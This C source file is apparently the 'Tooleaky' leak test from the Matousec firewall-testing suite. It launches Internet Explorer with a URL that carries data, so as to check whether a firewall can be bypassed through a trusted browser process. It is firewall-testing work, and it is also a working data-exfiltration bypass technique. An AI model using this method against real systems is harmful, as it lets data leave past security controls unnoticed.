/*

 Security Software Testing Suite - Tooleaky (leak-test)
 Copyright by www.matousec.com, Different Internet Experience Ltd.
 http://www.matousec.com/


 Credits:

   * This technique is used by Tooleaky, written by Bob Sundling, http://tooleaky.zensoft.com/.

   * This technique is also used by ZAbypass, written by Debasis Mohanty, http://www.hackingspirits.com/.

   * This technique is also used by Wallbreaker v4.0 - 2nd test, written by Guillaume Kaddouch,
     http://www.firewallleaktester.com/.


 Method description:

   * Obtain the Internet Explorer's path.

   * Execute the Internet Explorer with a URL as a command line parameter. This URL parameter,
     which also contains the data to transmit, redirects Internet Explorer to the Internet webpage.

*/

#include <stdio.h>
#include <windows.h>
#include <wininet.h>
#include "include/common.h"
#include "include/common-leak.h"
#include "include/common-hook.h"


int main(int argc,char *argv[])
{
  COM_CONF conf;
  if (!com_console_init_main("Tooleaky","tooleaky",argc,argv,&conf,COM_TEST_TYPE_TOOLEAKY)) return 1;

  char *used_dlls[]={"ntdll.dll","kernel32.dll"};
  if (!com_hook_load_libraries(used_dlls,2)) return 1;

  DeleteUrlCacheEntry(conf.uri);

  int res=FALSE;

  COM_ERROR err_inf;
  err_inf.occurred=FALSE;

  char imagepath[MAX_PATH];

  if (com_get_ie_path(imagepath,sizeof(imagepath),&err_inf))
  {
    if (com_verbosity_get()) printf("Internet Explorer's path set to \"%s\".\n",imagepath);

    char cmdline[COM_INET_URI_MAX_LEN+MAX_PATH];

    snprintf(cmdline,sizeof(cmdline),"\"%s\" %s",imagepath,conf.uri);
    cmdline[sizeof(cmdline)-1]='\0';

    STARTUPINFO si;
    memset(&si,0,sizeof(si));
    si.cb=sizeof(si);
    PROCESS_INFORMATION pi;

    if (CreateProcess(NULL,cmdline,NULL,NULL,FALSE,0,NULL,NULL,&si,&pi))
    {
      if (com_verbosity_get()) printf("Internet Explorer process created.\n");

      CloseHandle(pi.hProcess);
      CloseHandle(pi.hThread);

      char buffer[4096];
      res=com_attempt_check_ie_cache(buffer,sizeof(buffer),&conf,10000,&err_inf)
       && com_find_pattern_and_print_data(buffer,sizeof(buffer),&conf,&err_inf);
    } else com_err_set(&err_inf,"Unable to create child process with command line \"%s\".\n",cmdline);
  }

  return com_end(res,&err_inf,&conf);
}
